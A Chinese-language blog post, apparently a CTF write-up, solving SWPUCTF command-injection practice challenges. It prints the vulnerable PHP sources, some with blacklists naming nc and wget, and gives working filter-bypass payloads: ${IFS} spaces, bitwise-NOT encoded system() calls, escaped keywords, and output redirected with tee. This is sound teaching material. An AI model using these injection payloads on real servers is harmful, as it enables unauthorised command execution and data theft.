<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>RCE练习题 | Hexo</title><meta name="keywords" content="RCE,安全"><meta name="description" content="这里是你的文章正文内容… [SWPUCTF 2023 秋季新生赛]RCE-PLUS12345678910111213141516 &lt;?phperror_reporting(0);highlight_file(__FILE__);function strCheck($cmd)&#123;    if(!preg_match(&quot;&#x2F;\;|\&amp;|\\$|\x09|\x26|more">
<meta property="og:type" content="article">
<meta property="og:title" content="RCE练习题">
<meta property="og:url" content="http://freesia1014.com/2026/06/13/RCE%E7%BB%83%E4%B9%A0%E9%A2%98/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="这里是你的文章正文内容… [SWPUCTF 2023 秋季新生赛]RCE-PLUS12345678910111213141516 &lt;?phperror_reporting(0);highlight_file(__FILE__);function strCheck($cmd)&#123;    if(!preg_match(&quot;&#x2F;\;|\&amp;|\\$|\x09|\x26|more">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260529195930495.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260529200731173.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260604115531727.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260604115614706.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260604203229075.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260604203257994.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260604203708209.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260604203743226.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260608194104909.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260608194942253.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260608195057262.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260608200403555.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260608200738788.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260613200059681.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260613200414789.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260613201500581.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260613201603408.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260613202517453.png">
<meta property="og:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260613202823660.png">
<meta property="article:published_time" content="2026-06-13T13:12:00.000Z">
<meta property="article:modified_time" content="2026-06-14T07:16:45.208Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://freesia1014.com/AppData/Roaming/Typora/typora-user-images/image-20260529195930495.png"><link rel="canonical" href="http://freesia1014.com/2026/06/13/RCE%E7%BB%83%E4%B9%A0%E9%A2%98/"><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@11.12.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@11.12.2/dist/mermaid.esm.min.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 8.1.2"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>RCE练习题</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2026-06-13T13:12:00.000Z" id="date"> 2026-06-13</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2026-06-14T07:16:45.208Z" id="updated"> 2026-06-14</time></div></span></div></div><hr><div id="post-content"><p>这里是你的文章正文内容…</p>
<h2 id="SWPUCTF-2023-秋季新生赛-RCE-PLUS"><a href="#SWPUCTF-2023-秋季新生赛-RCE-PLUS" class="headerlink" title="[SWPUCTF 2023 秋季新生赛]RCE-PLUS"></a>[SWPUCTF 2023 秋季新生赛]RCE-PLUS</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">strCheck</span>(<span class="hljs-params"><span class="hljs-variable">$cmd</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/\;|\&amp;|\\$|\x09|\x26|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i&quot;</span>, <span class="hljs-variable">$cmd</span>))&#123;<br>        <span class="hljs-keyword">return</span>(<span class="hljs-variable">$cmd</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;i hate this&quot;</span>);      <br>      &#125;<br>&#125;<br><span class="hljs-variable">$cmd</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br><span class="hljs-title function_ invoke__">strCheck</span>(<span class="hljs-variable">$cmd</span>);<br><span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-variable">$cmd</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>题目描述：没有回显。所以尝试将命令执行的结果写入文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?cmd=ls / &gt;tee 1.txt<br>?cmd=ls / &gt; 1.txt<br></code></pre></td></tr></table></figure>

<p>不止这些，还有其他命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">ls / | tee 1.txt<br>ls / &gt;&gt; 1.txt<br>ls / | dd of=1.txt<br>cat &gt; 1.txt &lt;&lt;&lt; &quot;$(ls /)&quot;<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260529195930495.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260529195930495.png" alt="image-20260529195930495"></p>
<p>接下来，读取flag文件，看正则被过滤，使用绕过</p>
<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260529200731173.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260529200731173.png" alt="image-20260529200731173"></p>
<h2 id="SWPUCTF-2021-新生赛-easyrce"><a href="#SWPUCTF-2021-新生赛-easyrce" class="headerlink" title="[SWPUCTF 2021 新生赛]easyrce"></a>[SWPUCTF 2021 新生赛]easyrce</h2><p>简单</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?url=system(&#x27;ls /&#x27;);<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260604115531727.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260604115531727.png" alt="image-20260604115531727"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?url=system(&#x27;cat /flllllaaaaaaggggggg&#x27;);<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260604115614706.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260604115614706.png" alt="image-20260604115614706"></p>
<h2 id="SWPUCTF-2021-新生赛-babyrce"><a href="#SWPUCTF-2021-新生赛-babyrce" class="headerlink" title="[SWPUCTF 2021 新生赛]babyrce"></a>[SWPUCTF 2021 新生赛]babyrce</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&quot;Content-Type:text/html;charset=utf-8&quot;</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&#x27;admin&#x27;</span>]==<span class="hljs-number">1</span>) <br>&#123;<br>    <span class="hljs-keyword">include</span> <span class="hljs-string">&quot;../next.php&quot;</span>;<br>&#125;<br><span class="hljs-keyword">else</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;小饼干最好吃啦！&quot;</span>;<br><span class="hljs-meta">?&gt;</span> 小饼干最好吃啦！<br></code></pre></td></tr></table></figure>

<p>看题目，bp抓包将admin改为1</p>
<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260604203229075.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260604203229075.png" alt="image-20260604203229075"></p>
<p>得到一个路径</p>
<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260604203257994.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260604203257994.png" alt="image-20260604203257994"></p>
<p>访问路径，看到题目源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>); <br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>); <br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>); <br><span class="hljs-keyword">if</span><span class="hljs-title function_ invoke__"> </span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;url&#x27;</span>])) &#123; <br>  <span class="hljs-variable">$ip</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;url&#x27;</span>]; <br>  <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/ /&quot;</span>, <span class="hljs-variable">$ip</span>))&#123; <br>      <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;nonono&#x27;</span>); <br>  &#125; <br>  <span class="hljs-variable">$a </span>= <span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-variable">$ip</span>); <br>  <span class="hljs-keyword">echo</span> <span class="hljs-variable">$a</span>; <br>&#125; <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>过滤了空格，使用空格绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?url=ls$&#123;IFS&#125;/<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260604203708209.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260604203708209.png" alt="image-20260604203708209"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?url=cat$&#123;IFS&#125;/flllllaaaaaaggggggg<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260604203743226.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260604203743226.png" alt="image-20260604203743226"></p>
<h2 id="SWPUCTF-2021-新生赛-hardrce"><a href="#SWPUCTF-2021-新生赛-hardrce" class="headerlink" title="[SWPUCTF 2021 新生赛]hardrce"></a>[SWPUCTF 2021 新生赛]hardrce</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&quot;Content-Type:text/html;charset=utf-8&quot;</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;wllm&#x27;</span>]))<br>&#123;<br>    <span class="hljs-variable">$wllm</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;wllm&#x27;</span>];<br>    <span class="hljs-variable">$blacklist</span> = [<span class="hljs-string">&#x27; &#x27;</span>,<span class="hljs-string">&#x27;\t&#x27;</span>,<span class="hljs-string">&#x27;\r&#x27;</span>,<span class="hljs-string">&#x27;\n&#x27;</span>,<span class="hljs-string">&#x27;\+&#x27;</span>,<span class="hljs-string">&#x27;\[&#x27;</span>,<span class="hljs-string">&#x27;\^&#x27;</span>,<span class="hljs-string">&#x27;\]&#x27;</span>,<span class="hljs-string">&#x27;\&quot;&#x27;</span>,<span class="hljs-string">&#x27;\-&#x27;</span>,<span class="hljs-string">&#x27;\$&#x27;</span>,<span class="hljs-string">&#x27;\*&#x27;</span>,<span class="hljs-string">&#x27;\?&#x27;</span>,<span class="hljs-string">&#x27;\&lt;&#x27;</span>,<span class="hljs-string">&#x27;\&gt;&#x27;</span>,<span class="hljs-string">&#x27;\=&#x27;</span>,<span class="hljs-string">&#x27;\`&#x27;</span>,];<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$blacklist</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$blackitem</span>)<br>    &#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/&#x27;</span> . <span class="hljs-variable">$blackitem</span> . <span class="hljs-string">&#x27;/m&#x27;</span>, <span class="hljs-variable">$wllm</span>)) &#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;LTLT说不能用这些奇奇怪怪的符号哦！&quot;</span>);<br>    &#125;&#125;<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/[a-zA-Z]/is&#x27;</span>,<span class="hljs-variable">$wllm</span>))<br>&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Ra&#x27;s Al Ghul说不能用字母哦！&quot;</span>);<br>&#125;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;NoVic4说：不错哦小伙子，可你能拿到flag吗？&quot;</span>;<br><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$wllm</span>);<br>&#125;<br><span class="hljs-keyword">else</span><br>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;蔡总说：注意审题！！！&quot;</span>;<br>&#125;<br><span class="hljs-meta">?&gt;</span> 蔡总说：注意审题！！！<br></code></pre></td></tr></table></figure>

<h3 id="无字母数字绕过"><a href="#无字母数字绕过" class="headerlink" title="无字母数字绕过"></a>无字母数字绕过</h3><p>使用在线php网站构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">&#x27;system&#x27;</span>);   <span class="hljs-comment">//&quot;~&quot;对字符串按位取反</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;\n&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">&#x27;ls /&#x27;</span>);<br><span class="hljs-meta">?&gt;</span><br>    <br>结果：<br>%<span class="hljs-number">8</span>C%<span class="hljs-number">86</span>%<span class="hljs-number">8</span>C%<span class="hljs-number">8</span>B%<span class="hljs-number">9</span>A%<span class="hljs-number">92</span><br>%<span class="hljs-number">93</span>%<span class="hljs-number">8</span>C%DF%D0<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260608194104909.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260608194104909.png" alt="image-20260608194104909"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?wllm=~(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260608194942253.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260608194942253.png" alt="image-20260608194942253"></p>
<p>说明这个方法是正确的，继续构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">&#x27;system&#x27;</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;\n&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">&#x27;cat /flllllaaaaaaggggggg&#x27;</span>);<br><span class="hljs-meta">?&gt;</span><br>    <br>结果：<br>%<span class="hljs-number">8</span>C%<span class="hljs-number">86</span>%<span class="hljs-number">8</span>C%<span class="hljs-number">8</span>B%<span class="hljs-number">9</span>A%<span class="hljs-number">92</span><br>%<span class="hljs-number">9</span>C%<span class="hljs-number">9</span>E%<span class="hljs-number">8</span>B%DF%D0%<span class="hljs-number">99</span>%<span class="hljs-number">93</span>%<span class="hljs-number">93</span>%<span class="hljs-number">93</span>%<span class="hljs-number">93</span>%<span class="hljs-number">93</span>%<span class="hljs-number">9</span>E%<span class="hljs-number">9</span>E%<span class="hljs-number">9</span>E%<span class="hljs-number">9</span>E%<span class="hljs-number">9</span>E%<span class="hljs-number">9</span>E%<span class="hljs-number">98</span>%<span class="hljs-number">98</span>%<span class="hljs-number">98</span>%<span class="hljs-number">98</span>%<span class="hljs-number">98</span>%<span class="hljs-number">98</span>%<span class="hljs-number">98</span><br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?wllm=~(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260608195057262.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260608195057262.png" alt="image-20260608195057262"></p>
<h1 id="SWPUCTF-2021-新生赛-finalrce"><a href="#SWPUCTF-2021-新生赛-finalrce" class="headerlink" title="[SWPUCTF 2021 新生赛]finalrce"></a>[SWPUCTF 2021 新生赛]finalrce</h1><h3 id="无回显绕过exec"><a href="#无回显绕过exec" class="headerlink" title="无回显绕过exec()"></a>无回显绕过<code>exec()</code></h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;url&#x27;</span>]))<br>&#123;<br>    <span class="hljs-variable">$url</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;url&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\&quot;|\&gt;|\&lt;|\%|\$/i&#x27;</span>,<span class="hljs-variable">$url</span>))<br>    &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Sorry,you can&#x27;t use this.&quot;</span>;<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Can you see anything?&quot;</span>;<br>        <span class="hljs-title function_ invoke__">exec</span>(<span class="hljs-variable">$url</span>);<br>    &#125;<br>&#125; <br></code></pre></td></tr></table></figure>

<p>本题使用了<code>exec()</code>函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">exec</span>(<span class="hljs-keyword">string</span> <span class="hljs-variable">$ommand</span>[, <span class="hljs-keyword">array</span> &amp;<span class="hljs-variable">$utput</span> [, <span class="hljs-keyword">int</span>&amp;<span class="hljs-variable">$eturn_var</span> ]])<br></code></pre></td></tr></table></figure>

<p>$command是要执行的命令。单独使用时只有<strong>最后一行结果，且不会回显</strong>。</p>
<p>$output是获得执行命令输出的每一行字符串，$return_var用来保存命令执行的状态码（检测成功或失败）</p>
<p>执行无回显，默认返回最后一行结果</p>
<p>借用<strong>print_r</strong>输出结果</p>
<p>需要第二个参数，依靠指令才能回显出来</p>
<p>构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?url=l\s / |tee 1.txt<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260608200403555.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260608200403555.png" alt="image-20260608200403555"></p>
<p>现在页面上执行<code>?url=l\s / |tee 1.txt</code>，然后在url输入<code>/1.txt</code>，查看有没有正常写入</p>
<p>接下来构造flag的payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?url=tac /flllll\aaaaaaggggggg |tee 1.txt<br></code></pre></td></tr></table></figure>

<p>这里的la也要绕过一下</p>
<p class='item-img' data-src='/../../AppData/Roaming/Typora/typora-user-images/image-20260608200738788.png'><img src="/../../AppData/Roaming/Typora/typora-user-images/image-20260608200738788.png" alt="image-20260608200738788"></p>
<p>与上面的操作流程一样</p>
